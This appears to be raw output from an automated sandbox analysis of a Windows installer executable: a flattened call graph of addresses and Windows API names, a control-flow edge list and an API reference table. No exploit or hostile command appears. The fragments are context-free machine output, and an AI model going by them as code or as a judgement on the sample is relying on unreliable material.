MessageBoxIndirectW 3461->3468 3478 40600c GetFileAttributesW 3461->3478 3481 406031 GetFileAttributesW CreateFileW 3461->3481 3519 40689e FindFirstFileW 3461->3519 3464 40190b 3462->3464 3465 40191e 3462->3465 3466 40657e 21 API calls 3464->3466 3467 40657e 21 API calls 3465->3467 3469 
401913 lstrcatW 3466->3469 3470 401926 3467->3470 3468->3461 3469->3470 3471 405ba1 MessageBoxIndirectW 3470->3471 3471->3463 3473 402dd7 3472->3473 3474 40657e 21 API calls 3473->3474 3475 402df8 3474->3475 3476 402e04 3475->3476 3477 4067ef 5 API calls 3475->3477 3476->3436 3477->3476 3479 40602b 3478->3479 3480 40601e SetFileAttributesW 3478->3480 3479->3461 3480->3479 3481->3461 3483 4055e1 3482->3483 3492 4018bc 3482->3492 3484 4055fd lstrlenW 3483->3484 3485 40657e 21 API calls 3483->3485 3486 405626 3484->3486 3487 40560b lstrlenW 3484->3487 3485->3484 3489 405639 3486->3489 3490 40562c SetWindowTextW 3486->3490 3488 40561d lstrcatW 3487->3488 3487->3492 3488->3486 3491 40563f SendMessageW SendMessageW SendMessageW 3489->3491 3489->3492 3490->3489 3491->3492 3493 4032d9 3492->3493 3494 4032f2 3493->3494 3495 40331d 3494->3495 3534 4034d4 SetFilePointer 3494->3534 3522 4034be 3495->3522 3499 40333a GetTickCount 3510 40334d 3499->3510 3500 40345e 3501 403462 3500->3501 3506 40347a 3500->3506 3503 4034be ReadFile 3501->3503 3502 4018cf 3502->3458 3502->3460 3503->3502 3504 4034be ReadFile 3504->3506 3505 4034be ReadFile 3505->3510 3506->3502 3506->3504 3507 4060e3 WriteFile 3506->3507 3507->3506 3509 4033b3 GetTickCount 3509->3510 3510->3502 3510->3505 3510->3509 3511 4033dc MulDiv wsprintfW 3510->3511 3525 406ab0 3510->3525 3532 4060e3 WriteFile 3510->3532 3512 4055c6 28 API calls 3511->3512 3512->3510 3514->3441 3515->3442 3517 4017d4 lstrcatW 3516->3517 3518 405e2c lstrcatW 3516->3518 3517->3441 3518->3517 3520 4068b4 FindClose 3519->3520 3521 4068bf 3519->3521 3520->3521 3521->3461 3535 4060b4 ReadFile 3522->3535 3526 406ad5 3525->3526 3527 406add 3525->3527 3526->3510 3527->3526 3528 406b64 GlobalFree 3527->3528 3529 406b6d GlobalAlloc 3527->3529 3530 406be4 GlobalAlloc 3527->3530 3531 406bdb GlobalFree 3527->3531 3528->3529 3529->3526 3529->3527 3530->3526 3530->3527 3531->3530 3533 406101 3532->3533 3533->3510 3534->3495 3536 403328 3535->3536 3536->3499 
3536->3500 3536->3502 4525 401a97 4526 402da9 21 API calls 4525->4526 4527 401aa0 4526->4527 4528 402da9 21 API calls 4527->4528 4529 401a45 4528->4529 3635 401598 3636 4015b1 3635->3636 3637 4015a8 ShowWindow 3635->3637 3638 402c4f 3636->3638 3639 4015bf ShowWindow 3636->3639 3637->3636 3639->3638 4530 402419 4531 402dcb 21 API calls 4530->4531 4532 402428 4531->4532 4533 402dcb 21 API calls 4532->4533 4534 402431 4533->4534 4535 402dcb 21 API calls 4534->4535 4536 40243b GetPrivateProfileStringW 4535->4536 4537 40201b 4538 402dcb 21 API calls 4537->4538 4539 402022 4538->4539 4540 40689e 2 API calls 4539->4540 4541 402028 4540->4541 4543 402039 4541->4543 4544 406488 wsprintfW 4541->4544 4544->4543 3668 40351c SetErrorMode GetVersionExW 3669 403570 GetVersionExW 3668->3669 3670 4035a8 3668->3670 3669->3670 3671 4035ff 3670->3671 3672 406935 5 API calls 3670->3672 3673 4068c5 3 API calls 3671->3673 3672->3671 3674 403615 lstrlenA 3673->3674 3674->3671 3675 403625 3674->3675 3676 406935 5 API calls 3675->3676 3677 40362c 3676->3677 3678 406935 5 API calls 3677->3678 3679 403633 3678->3679 3680 406935 5 API calls 3679->3680 3681 40363f #17 OleInitialize SHGetFileInfoW 3680->3681 3756 406541 lstrcpynW 3681->3756 3684 40368e GetCommandLineW 3757 406541 lstrcpynW 3684->3757 3686 4036a0 3687 405e3d CharNextW 3686->3687 3688 4036c6 CharNextW 3687->3688 3696 4036d8 3688->3696 3689 4037da 3690 4037ee GetTempPathW 3689->3690 3758 4034eb 3690->3758 3692 403806 3693 403860 DeleteFileW 3692->3693 3694 40380a GetWindowsDirectoryW lstrcatW 3692->3694 3768 4030a2 GetTickCount GetModuleFileNameW 3693->3768 3697 4034eb 12 API calls 3694->3697 3695 405e3d CharNextW 3695->3696 3696->3689 3696->3695 3702 4037dc 3696->3702 3699 403826 3697->3699 3699->3693 3701 40382a GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3699->3701 3700 403874 3703 40392b 3700->3703 3706 40391b 3700->3706 3710 405e3d CharNextW 3700->3710 3704 4034eb 12 API calls 3701->3704 3852 406541 
lstrcpynW 3702->3852 3911 403b39 3703->3911 3708 403858 3704->3708 3796 403c13 3706->3796 3708->3693 3708->3703 3723 403893 3710->3723 3712 403a79 3716 405ba1 MessageBoxIndirectW 3712->3716 3713 403a9d 3714 403b21 ExitProcess 3713->3714 3715 403aa5 GetCurrentProcess OpenProcessToken 3713->3715 3717 403af1 3715->3717 3718 403abd LookupPrivilegeValueW AdjustTokenPrivileges 3715->3718 3722 403a87 ExitProcess 3716->3722 3725 406935 5 API calls 3717->3725 3718->3717 3719 4038f1 3853 405f18 3719->3853 3720 403934 3724 405b0c 5 API calls 3720->3724 3723->3719 3723->3720 3727 403939 lstrlenW 3724->3727 3728 403af8 3725->3728 3869 406541 lstrcpynW 3727->3869 3731 403b0d ExitWindowsEx 3728->3731 3733 403b1a 3728->3733 3731->3714 3731->3733 3732 403953 3735 40395c 3732->3735 3753 40396b 3732->3753 3736 40140b 2 API calls 3733->3736 3870 406541 lstrcpynW 3735->3870 3736->3714 3737 403910 3868 406541 lstrcpynW 3737->3868 3740 403991 wsprintfW 3741 40657e 21 API calls 3740->3741 3741->3753 3742 405aef 2 API calls 3742->3753 3743 405a95 2 API calls 3743->3753 3744 403a07 SetCurrentDirectoryW 3907 406301 MoveFileExW 3744->3907 3745 4039cd GetFileAttributesW 3746 4039d9 DeleteFileW 3745->3746 3745->3753 3746->3753 3750 406301 40 API calls 3750->3753 3751 40657e 21 API calls 3751->3753 3752 405b24 2 API calls 3752->3753 3753->3703 3753->3740 3753->3742 3753->3743 3753->3744 3753->3745 3753->3750 3753->3751 3753->3752 3754 403a8f CloseHandle 3753->3754 3755 40689e 2 API calls 3753->3755 3871 405c4d 3753->3871 3754->3703 3755->3753 3756->3684 3757->3686 3759 4067ef 5 API calls 3758->3759 3760 4034f7 3759->3760 3761 403501 3760->3761 3762 405e10 3 API calls 3760->3762 3761->3692 3763 403509 3762->3763 3764 405aef 2 API calls 3763->3764 3765 40350f 3764->3765 3918 406060 3765->3918 3922 406031 GetFileAttributesW CreateFileW 3768->3922 3770 4030e2 3791 4030f2 3770->3791 3923 406541 lstrcpynW 3770->3923 3772 403108 3924 405e5c lstrlenW 3772->3924 3776 403119 GetFileSize 3777 403213 
3776->3777 3789 403130 3776->3789 3929 40303e 3777->3929 3779 40321c 3781 40324c GlobalAlloc 3779->3781 3779->3791 3941 4034d4 SetFilePointer 3779->3941 3780 4034be ReadFile 3780->3789 3940 4034d4 SetFilePointer 3781->3940 3783 40327f 3787 40303e 6 API calls 3783->3787 3785 403235 3788 4034be ReadFile 3785->3788 3786 403267 3790 4032d9 39 API calls 3786->3790 3787->3791 3792 403240 3788->3792 3789->3777 3789->3780 3789->3783 3789->3791 3793 40303e 6 API calls 3789->3793 3794 403273 3790->3794 3791->3700 3792->3781 3792->3791 3793->3789 3794->3791 3794->3794 3795 4032b0 SetFilePointer 3794->3795 3795->3791 3797 406935 5 API calls 3796->3797 3798 403c27 3797->3798 3799 403c2d 3798->3799 3800 403c3f 3798->3800 3950 406488 wsprintfW 3799->3950 3801 40640f 3 API calls 3800->3801 3802 403c6f 3801->3802 3804 403c8e lstrcatW 3802->3804 3806 40640f 3 API calls 3802->3806 3805 403c3d 3804->3805 3942 403ee9 3805->3942 3806->3804 3809 405f18 18 API calls 3810 403cc0 3809->3810 3811 403d54 3810->3811 3813 40640f 3 API calls 3810->3813 3812 405f18 18 API calls 3811->3812 3814 403d5a 3812->3814 3815 403cf2 3813->3815 3816 403d6a LoadImageW 3814->3816 3817 40657e 21 API calls 3814->3817 3815->3811 3820 403d13 lstrlenW 3815->3820 3824 405e3d CharNextW 3815->3824 3818 403e10 3816->3818 3819 403d91 RegisterClassW 3816->3819 3817->3816 3822 40140b 2 API calls 3818->3822 3821 403dc7 SystemParametersInfoW CreateWindowExW 3819->3821 3851 403e1a 3819->3851 3825 403d21 lstrcmpiW 3820->3825 3826 403d47 3820->3826 3821->3818 3823 403e16 3822->3823 3830 403ee9 22 API calls 3823->3830 3823->3851 3828 403d10 3824->3828 3825->3826 3829 403d31 GetFileAttributesW 3825->3829 3827 405e10 3 API calls 3826->3827 3831 403d4d 3827->3831 3828->3820 3832 403d3d 3829->3832 3834 403e27 3830->3834 3951 406541 lstrcpynW 3831->3951 3832->3826 3833 405e5c 2 API calls 3832->3833 3833->3826 3836 403e33 ShowWindow 3834->3836 3837 403eb6 3834->3837 3839 4068c5 3 API calls 3836->3839 3838 405699 5 API calls 
3837->3838 3840 403ebc 3838->3840 3841 403e4b 3839->3841 3842 403ec0 3840->3842 3843 403ed8 3840->3843 3844 403e59 GetClassInfoW 3841->3844 3846 4068c5 3 API calls 3841->3846 3849 40140b 2 API calls 3842->3849 3842->3851 3845 40140b 2 API calls 3843->3845 3847 403e83 DialogBoxParamW 3844->3847 3848 403e6d GetClassInfoW RegisterClassW 3844->3848 3845->3851 3846->3844 3850 40140b 2 API calls 3847->3850 3848->3847 3849->3851 3850->3851 3851->3703 3852->3690 3953 406541 lstrcpynW 3853->3953 3855 405f29 3856 405ebb 4 API calls 3855->3856 3857 405f2f 3856->3857 3858 4038fd 3857->3858 3859 4067ef 5 API calls 3857->3859 3858->3703 3867 406541 lstrcpynW 3858->3867 3865 405f3f 3859->3865 3860 405f70 lstrlenW 3861 405f7b 3860->3861 3860->3865 3862 405e10 3 API calls 3861->3862 3864 405f80 GetFileAttributesW 3862->3864 3863 40689e 2 API calls 3863->3865 3864->3858 3865->3858 3865->3860 3865->3863 3866 405e5c 2 API calls 3865->3866 3866->3860 3867->3737 3868->3706 3869->3732 3870->3753 3872 405f18 18 API calls 3871->3872 3873 405c6d 3872->3873 3874 405c75 DeleteFileW 3873->3874 3875 405c8c 3873->3875 3876 405dc3 3874->3876 3878 405dac 3875->3878 3954 406541 lstrcpynW 3875->3954 3876->3753 3878->3876 3884 40689e 2 API calls 3878->3884 3879 405cb2 3880 405cc5 3879->3880 3881 405cb8 lstrcatW 3879->3881 3883 405e5c 2 API calls 3880->3883 3882 405ccb 3881->3882 3885 405cdb lstrcatW 3882->3885 3887 405ce6 lstrlenW FindFirstFileW 3882->3887 3883->3882 3886 405dd1 3884->3886 3885->3887 3886->3876 3888 405e10 3 API calls 3886->3888 3887->3878 3905 405d08 3887->3905 3889 405ddb 3888->3889 3891 405c05 5 API calls 3889->3891 3890 405d8f FindNextFileW 3893 405da5 FindClose 3890->3893 3890->3905 3894 405de7 3891->3894 3893->3878 3895 405e01 3894->3895 3896 405deb 3894->3896 3898 4055c6 28 API calls 3895->3898 3896->3876 3899 4055c6 28 API calls 3896->3899 3898->3876 3901 405df8 3899->3901 3900 405c4d 64 API calls 3900->3905 3902 406301 40 API calls 3901->3902 3902->3876 3903 4055c6 28 API 
calls 3903->3890 3904 4055c6 28 API calls 3904->3905 3905->3890 3905->3900 3905->3903 3905->3904 3906 406301 40 API calls 3905->3906 3955 406541 lstrcpynW 3905->3955 3956 405c05 3905->3956 3906->3905 3908 403a16 CopyFileW 3907->3908 3909 406315 3907->3909 3908->3703 3908->3753 3964 406187 3909->3964 3912 403b51 3911->3912 3913 403b43 CloseHandle 3911->3913 3998 403b7e 3912->3998 3913->3912 3916 405c4d 71 API calls 3917 403a6c OleUninitialize 3916->3917 3917->3712 3917->3713 3919 40606d GetTickCount GetTempFileNameW 3918->3919 3920 40351a 3919->3920 3921 4060a3 3919->3921 3920->3692 3921->3919 3921->3920 3922->3770 3923->3772 3925 405e6a 3924->3925 3926 405e70 CharPrevW 3925->3926 3927 40310e 3925->3927 3926->3925 3926->3927 3928 406541 lstrcpynW 3927->3928 3928->3776 3930 403047 3929->3930 3931 40305f 3929->3931 3932 403050 DestroyWindow 3930->3932 3933 403057 3930->3933 3934 403067 3931->3934 3935 40306f GetTickCount 3931->3935 3932->3933 3933->3779 3936 406971 2 API calls 3934->3936 3937 4030a0 3935->3937 3938 40307d CreateDialogParamW ShowWindow 3935->3938 3939 40306d 3936->3939 3937->3779 3938->3937 3939->3779 3940->3786 3941->3785 3943 403efd 3942->3943 3952 406488 wsprintfW 3943->3952 3945 403f6e 3946 403fa2 22 API calls 3945->3946 3948 403f73 3946->3948 3947 403c9e 3947->3809 3948->3947 3949 40657e 21 API calls 3948->3949 3949->3948 3950->3805 3951->3811 3952->3945 3953->3855 3954->3879 3955->3905 3957 40600c 2 API calls 3956->3957 3958 405c11 3957->3958 3959 405c32 3958->3959 3960 405c20 RemoveDirectoryW 3958->3960 3961 405c28 DeleteFileW 3958->3961 3959->3905 3962 405c2e 3960->3962 3961->3962 3962->3959 3963 405c3e SetFileAttributesW 3962->3963 3963->3959 3965 4061b7 3964->3965 3966 4061dd GetShortPathNameW 3964->3966 3991 406031 GetFileAttributesW CreateFileW 3965->3991 3968 4061f2 3966->3968 3969 4062fc 3966->3969 3968->3969 3971 4061fa wsprintfA 3968->3971 3969->3908 3970 4061c1 CloseHandle GetShortPathNameW 3970->3969 3972 4061d5 3970->3972 3973 40657e 
21 API calls 3971->3973 3972->3966 3972->3969 3974 406222 3973->3974 3992 406031 GetFileAttributesW CreateFileW 3974->3992 3976 40622f 3976->3969 3977 40623e GetFileSize GlobalAlloc 3976->3977 3978 406260 3977->3978 3979 4062f5 CloseHandle 3977->3979 3980 4060b4 ReadFile 3978->3980 3979->3969 3981 406268 3980->3981 3981->3979 3993 405f96 lstrlenA 3981->3993 3984 406293 3986 405f96 4 API calls 3984->3986 3985 40627f lstrcpyA 3987 4062a1 3985->3987 3986->3987 3988 4062d8 SetFilePointer 3987->3988 3989 4060e3 WriteFile 3988->3989 3990 4062ee GlobalFree 3989->3990 3990->3979 3991->3970 3992->3976 3994 405fd7 lstrlenA 3993->3994 3995 405fb0 lstrcmpiA 3994->3995 3996 405fdf 3994->3996 3995->3996 3997 405fce CharNextA 3995->3997 3996->3984 3996->3985 3997->3994 3999 403b8c 3998->3999 4000 403b56 3999->4000 4001 403b91 FreeLibrary GlobalFree 3999->4001 4000->3916 4001->4000 4001->4001 4552 401b9c 4553 402dcb 21 API calls 4552->4553 4554 401ba3 4553->4554 4555 402da9 21 API calls 4554->4555 4556 401bac wsprintfW 4555->4556 4557 402c4f 4556->4557 4558 40149e 4559 4023c2 4558->4559 4560 4014ac PostQuitMessage 4558->4560 4560->4559 4561 4016a0 4562 402dcb 21 API calls 4561->4562 4563 4016a7 4562->4563 4564 402dcb 21 API calls 4563->4564 4565 4016b0 4564->4565 4566 402dcb 21 API calls 4565->4566 4567 4016b9 MoveFileW 4566->4567 4568 4016cc 4567->4568 4574 4016c5 4567->4574 4569 40231b 4568->4569 4570 40689e 2 API calls 4568->4570 4572 4016db 4570->4572 4571 401423 28 API calls 4571->4569 4572->4569 4573 406301 40 API calls 4572->4573 4573->4574 4574->4571 4575 401a24 4576 402dcb 21 API calls 4575->4576 4577 401a2b 4576->4577 4578 402dcb 21 API calls 4577->4578 4579 401a34 4578->4579 4580 401a3b lstrcmpiW 4579->4580 4581 401a4d lstrcmpW 4579->4581 4582 401a41 4580->4582 4581->4582 4583 402324 4584 402dcb 21 API calls 4583->4584 4585 40232a 4584->4585 4586 402dcb 21 API calls 4585->4586 4587 402333 4586->4587 4588 402dcb 21 API calls 4587->4588 4589 40233c 4588->4589 4590 40689e 
2 API calls 4589->4590 4591 402345 4590->4591 4592 402356 lstrlenW lstrlenW 4591->4592 4593 402349 4591->4593 4595 4055c6 28 API calls 4592->4595 4594 4055c6 28 API calls 4593->4594 4596 402351 4593->4596 4594->4596 4597 402394 SHFileOperationW 4595->4597 4597->4593 4597->4596 4598 401da6 4599 401db9 GetDlgItem 4598->4599 4600 401dac 4598->4600 4602 401db3 4599->4602 4601 402da9 21 API calls 4600->4601 4601->4602 4603 401dfa GetClientRect LoadImageW SendMessageW 4602->4603 4604 402dcb 21 API calls 4602->4604 4606 401e58 4603->4606 4608 401e64 4603->4608 4604->4603 4607 401e5d DeleteObject 4606->4607 4606->4608 4607->4608 4609 4023a8 4610 4023af 4609->4610 4612 4023c2 4609->4612 4611 40657e 21 API calls 4610->4611 4613 4023bc 4611->4613 4614 405ba1 MessageBoxIndirectW 4613->4614 4614->4612 4615 402c2a SendMessageW 4616 402c44 InvalidateRect 4615->4616 4617 402c4f 4615->4617 4616->4617 4625 404f2d GetDlgItem GetDlgItem 4626 4051a4 4625->4626 4627 404f7f 7 API calls 4625->4627 4631 405286 4626->4631 4659 405213 4626->4659 4679 404e7b SendMessageW 4626->4679 4628 405026 DeleteObject 4627->4628 4629 405019 SendMessageW 4627->4629 4630 40502f 4628->4630 4629->4628 4632 405066 4630->4632 4633 40657e 21 API calls 4630->4633 4635 405332 4631->4635 4640 405197 4631->4640 4645 4052df SendMessageW 4631->4645 4634 4044c0 22 API calls 4632->4634 4638 405048 SendMessageW SendMessageW 4633->4638 4639 40507a 4634->4639 4636 405344 4635->4636 4637 40533c SendMessageW 4635->4637 4647 405356 ImageList_Destroy 4636->4647 4648 40535d 4636->4648 4656 40536d 4636->4656 4637->4636 4638->4630 4644 4044c0 22 API calls 4639->4644 4642 404527 8 API calls 4640->4642 4641 405278 SendMessageW 4641->4631 4646 405533 4642->4646 4660 40508b 4644->4660 4645->4640 4650 4052f4 SendMessageW 4645->4650 4647->4648 4651 405366 GlobalFree 4648->4651 4648->4656 4649 4054e7 4649->4640 4654 4054f9 ShowWindow GetDlgItem ShowWindow 4649->4654 4653 405307 4650->4653 4651->4656 4652 405166 GetWindowLongW 
SetWindowLongW 4655 40517f 4652->4655 4662 405318 SendMessageW 4653->4662 4654->4640 4657 405184 ShowWindow 4655->4657 4658 40519c 4655->4658 4656->4649 4672 4053a8 4656->4672 4684 404efb 4656->4684 4677 4044f5 SendMessageW 4657->4677 4678 4044f5 SendMessageW 4658->4678 4659->4631 4659->4641 4660->4652 4661 4050de SendMessageW 4660->4661 4663 405161 4660->4663 4666 405130 SendMessageW 4660->4666 4667 40511c SendMessageW 4660->4667 4661->4660 4662->4635 4663->4652 4663->4655 4666->4660 4667->4660 4669 4054b2 4670 4054bd InvalidateRect 4669->4670 4673 4054c9 4669->4673 4670->4673 4671 4053d6 SendMessageW 4676 4053ec 4671->4676 4672->4671 4672->4676 4673->4649 4693 404e36 4673->4693 4675 405460 SendMessageW SendMessageW 4675->4676 4676->4669 4676->4675 4677->4640 4678->4626 4680 404eda SendMessageW 4679->4680 4681 404e9e GetMessagePos ScreenToClient SendMessageW 4679->4681 4682 404ed2 4680->4682 4681->4682 4683 404ed7 4681->4683 4682->4659 4683->4680 4696 406541 lstrcpynW 4684->4696 4686 404f0e 4697 406488 wsprintfW 4686->4697 4688 404f18 4689 40140b 2 API calls 4688->4689 4690 404f21 4689->4690 4698 406541 lstrcpynW 4690->4698 4692 404f28 4692->4672 4699 404d6d 4693->4699 4695 404e4b 4695->4649 4696->4686 4697->4688 4698->4692 4702 404d86 4699->4702 4700 40657e 21 API calls 4701 404dea 4700->4701 4703 40657e 21 API calls 4701->4703 4702->4700 4704 404df5 4703->4704 4705 40657e 21 API calls 4704->4705 4706 404e0b lstrlenW wsprintfW SetDlgItemTextW 4705->4706 4706->4695 4002 4024af 4003 402dcb 21 API calls 4002->4003 4004 4024c1 4003->4004 4005 402dcb 21 API calls 4004->4005 4006 4024cb 4005->4006 4019 402e5b 4006->4019 4009 402953 4010 402503 4012 40250f 4010->4012 4014 402da9 21 API calls 4010->4014 4011 402dcb 21 API calls 4013 4024f9 lstrlenW 4011->4013 4015 40252e RegSetValueExW 4012->4015 4016 4032d9 39 API calls 4012->4016 4013->4010 4014->4012 4017 402544 RegCloseKey 4015->4017 4016->4015 4017->4009 4020 402e76 4019->4020 4023 4063dc 4020->4023 4024 4063eb 
4023->4024 4025 4024db 4024->4025 4026 4063f6 RegCreateKeyExW 4024->4026 4025->4009 4025->4010 4025->4011 4026->4025 4707 404630 lstrlenW 4708 404651 WideCharToMultiByte 4707->4708 4709 40464f 4707->4709 4709->4708 4710 402930 4711 402dcb 21 API calls 4710->4711 4712 402937 FindFirstFileW 4711->4712 4713 40295f 4712->4713 4717 40294a 4712->4717 4714 402968 4713->4714 4718 406488 wsprintfW 4713->4718 4719 406541 lstrcpynW 4714->4719 4718->4714 4719->4717 4720 401931 4721 401968 4720->4721 4722 402dcb 21 API calls 4721->4722 4723 40196d 4722->4723 4724 405c4d 71 API calls 4723->4724 4725 401976 4724->4725 4726 4049b1 4727 4049dd 4726->4727 4728 4049ee 4726->4728 4787 405b85 GetDlgItemTextW 4727->4787 4730 4049fa GetDlgItem 4728->4730 4736 404a59 4728->4736 4733 404a0e 4730->4733 4731 404b3d 4735 404cec 4731->4735 4789 405b85 GetDlgItemTextW 4731->4789 4732 4049e8 4734 4067ef 5 API calls 4732->4734 4738 404a22 SetWindowTextW 4733->4738 4739 405ebb 4 API calls 4733->4739 4734->4728 4743 404527 8 API calls 4735->4743 4736->4731 4736->4735 4740 40657e 21 API calls 4736->4740 4742 4044c0 22 API calls 4738->4742 4744 404a18 4739->4744 4745 404acd SHBrowseForFolderW 4740->4745 4741 404b6d 4746 405f18 18 API calls 4741->4746 4747 404a3e 4742->4747 4748 404d00 4743->4748 4744->4738 4752 405e10 3 API calls 4744->4752 4745->4731 4749 404ae5 CoTaskMemFree 4745->4749 4750 404b73 4746->4750 4751 4044c0 22 API calls 4747->4751 4753 405e10 3 API calls 4749->4753 4790 406541 lstrcpynW 4750->4790 4754 404a4c 4751->4754 4752->4738 4755 404af2 4753->4755 4788 4044f5 SendMessageW 4754->4788 4758 404b29 SetDlgItemTextW 4755->4758 4763 40657e 21 API calls 4755->4763 4758->4731 4759 404a52 4761 406935 5 API calls 4759->4761 4760 404b8a 4762 406935 5 API calls 4760->4762 4761->4736 4769 404b91 4762->4769 4764 404b11 lstrcmpiW 4763->4764 4764->4758 4767 404b22 lstrcatW 4764->4767 4765 404bd2 4791 406541 lstrcpynW 4765->4791 4767->4758 4768 404bd9 4770 405ebb 4 API calls 4768->4770 4769->4765 
4773 405e5c 2 API calls 4769->4773 4775 404c2a 4769->4775 4771 404bdf GetDiskFreeSpaceW 4770->4771 4774 404c03 MulDiv 4771->4774 4771->4775 4773->4769 4774->4775 4776 404c9b 4775->4776 4778 404e36 24 API calls 4775->4778 4777 404cbe 4776->4777 4779 40140b 2 API calls 4776->4779 4792 4044e2 KiUserCallbackDispatcher 4777->4792 4780 404c88 4778->4780 4779->4777 4782 404c9d SetDlgItemTextW 4780->4782 4783 404c8d 4780->4783 4782->4776 4785 404d6d 24 API calls 4783->4785 4784 404cda 4784->4735 4786 40490a SendMessageW 4784->4786 4785->4776 4786->4735 4787->4732 4788->4759 4789->4741 4790->4760 4791->4768 4792->4784 4793 401934 4794 402dcb 21 API calls 4793->4794 4795 40193b 4794->4795 4796 405ba1 MessageBoxIndirectW 4795->4796 4797 401944 4796->4797 4798 4028b6 4799 4028bd 4798->4799 4801 402bce 4798->4801 4800 402da9 21 API calls 4799->4800 4802 4028c4 4800->4802 4803 4028d3 SetFilePointer 4802->4803 4803->4801 4804 4028e3 4803->4804 4806 406488 wsprintfW 4804->4806 4806->4801 4807 401f37 4808 402dcb 21 API calls 4807->4808 4809 401f3d 4808->4809 4810 402dcb 21 API calls 4809->4810 4811 401f46 4810->4811 4812 402dcb 21 API calls 4811->4812 4813 401f4f 4812->4813 4814 402dcb 21 API calls 4813->4814 4815 401f58 4814->4815 4816 401423 28 API calls 4815->4816 4817 401f5f 4816->4817 4824 405b67 ShellExecuteExW 4817->4824 4819 401fa7 4820 402953 4819->4820 4821 4069e0 5 API calls 4819->4821 4822 401fc4 CloseHandle 4821->4822 4822->4820 4824->4819 4825 402fb8 4826 402fe3 4825->4826 4827 402fca SetTimer 4825->4827 4828 403038 4826->4828 4829 402ffd MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4826->4829 4827->4826 4829->4828 4830 4014b8 4831 4014be 4830->4831 4832 401389 2 API calls 4831->4832 4833 4014c6 4832->4833 4834 40553a 4835 40554a 4834->4835 4836 40555e 4834->4836 4838 405550 4835->4838 4839 4055a7 4835->4839 4837 405566 IsWindowVisible 4836->4837 4845 40557d 4836->4845 4837->4839 4841 405573 4837->4841 4840 40450c SendMessageW 4838->4840 4842 4055ac CallWindowProcW 
4839->4842 4843 40555a 4840->4843 4844 404e7b 5 API calls 4841->4844 4842->4843 4844->4845 4845->4842 4846 404efb 4 API calls 4845->4846 4846->4839 4847 401d3c 4848 402da9 21 API calls 4847->4848 4849 401d42 IsWindow 4848->4849 4850 401a45 4849->4850

                                                                            Control-flow Graph (text edge list: each entry is `node start-end [API calls]`, `a->b` is an edge from node a to node b, `call` marks a subcall and `* n` a call repeated n times)
                                                                            control_flow_graph 0 40351c-40356e SetErrorMode GetVersionExW 1 403570-4035a0 GetVersionExW 0->1 2 4035a8-4035ad 0->2 1->2 3 4035b5-4035f7 2->3 4 4035af 2->4 5 4035f9-403601 call 406935 3->5 6 40360a 3->6 4->3 5->6 12 403603 5->12 7 40360f-403623 call 4068c5 lstrlenA 6->7 13 403625-403641 call 406935 * 3 7->13 12->6 20 403652-4036b6 #17 OleInitialize SHGetFileInfoW call 406541 GetCommandLineW call 406541 13->20 21 403643-403649 13->21 28 4036b8-4036ba 20->28 29 4036bf-4036d3 call 405e3d CharNextW 20->29 21->20 26 40364b 21->26 26->20 28->29 32 4037ce-4037d4 29->32 33 4036d8-4036de 32->33 34 4037da 32->34 35 4036e0-4036e5 33->35 36 4036e7-4036ee 33->36 37 4037ee-403808 GetTempPathW call 4034eb 34->37 35->35 35->36 39 4036f0-4036f5 36->39 40 4036f6-4036fa 36->40 44 403860-40387a DeleteFileW call 4030a2 37->44 45 40380a-403828 GetWindowsDirectoryW lstrcatW call 4034eb 37->45 39->40 42 403700-403706 40->42 43 4037bb-4037ca call 405e3d 40->43 47 403720-403759 42->47 48 403708-40370f 42->48 43->32 61 4037cc-4037cd 43->61 66 403880-403886 44->66 67 403a67-403a77 call 403b39 OleUninitialize 44->67 45->44 64 40382a-40385a GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4034eb 45->64 49 403776-4037b0 47->49 50 40375b-403760 47->50 54 403711-403714 48->54 55 403716 48->55 58 4037b2-4037b6 49->58 59 4037b8-4037ba 49->59 50->49 56 403762-40376a 50->56 54->47 54->55 55->47 62 403771 56->62 63 40376c-40376f 56->63 58->59 65 4037dc-4037e9 call 406541 58->65 59->43 61->32 62->49 63->49 63->62 64->44 64->67 65->37 70 40388c-403897 call 405e3d 66->70 71 40391f-403926 call 403c13 66->71 78 403a79-403a89 call 405ba1 ExitProcess 67->78 79 403a9d-403aa3 67->79 81 4038e5-4038ef 70->81 82 403899-4038ce 70->82 77 40392b-40392f 71->77 77->67 83 403b21-403b29 79->83 84 403aa5-403abb GetCurrentProcess OpenProcessToken 79->84 89 4038f1-4038ff call 405f18 81->89 90 403934-40395a call 405b0c lstrlenW call 406541 
                                                                            81->90 86 4038d0-4038d4 82->86 91 403b2b 83->91 92 403b2f-403b33 ExitProcess 83->92 87 403af1-403aff call 406935 84->87 88 403abd-403aeb LookupPrivilegeValueW AdjustTokenPrivileges 84->88 94 4038d6-4038db 86->94 95 4038dd-4038e1 86->95 104 403b01-403b0b 87->104 105 403b0d-403b18 ExitWindowsEx 87->105 88->87 89->67 106 403905-40391b call 406541 * 2 89->106 110 40396b-403983 90->110 111 40395c-403966 call 406541 90->111 91->92 94->95 99 4038e3 94->99 95->86 95->99 99->81 104->105 108 403b1a-403b1c call 40140b 104->108 105->83 105->108 106->71 108->83 116 403988-40398c 110->116 111->110 118 403991-4039bb wsprintfW call 40657e 116->118 122 4039c4 call 405aef 118->122 123 4039bd-4039c2 call 405a95 118->123 126 4039c9-4039cb 122->126 123->126 128 403a07-403a26 SetCurrentDirectoryW call 406301 CopyFileW 126->128 129 4039cd-4039d7 GetFileAttributesW 126->129 137 403a65 128->137 138 403a28-403a49 call 406301 call 40657e call 405b24 128->138 130 4039f8-403a03 129->130 131 4039d9-4039e2 DeleteFileW 129->131 130->116 134 403a05 130->134 131->130 133 4039e4-4039f6 call 405c4d 131->133 133->118 133->130 134->67 137->67 146 403a4b-403a55 138->146 147 403a8f-403a9b CloseHandle 138->147 146->137 148 403a57-403a5f call 40689e 146->148 147->137 148->118 148->137
                                                                            APIs
                                                                            • SetErrorMode.KERNELBASE ref: 0040353F
                                                                            • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040356A
                                                                            • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 0040357D
                                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 00403616
                                                                            • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403653
                                                                            • OleInitialize.OLE32(00000000), ref: 0040365A
                                                                            • SHGetFileInfoW.SHELL32(00420EC8,00000000,?,000002B4,00000000), ref: 00403679
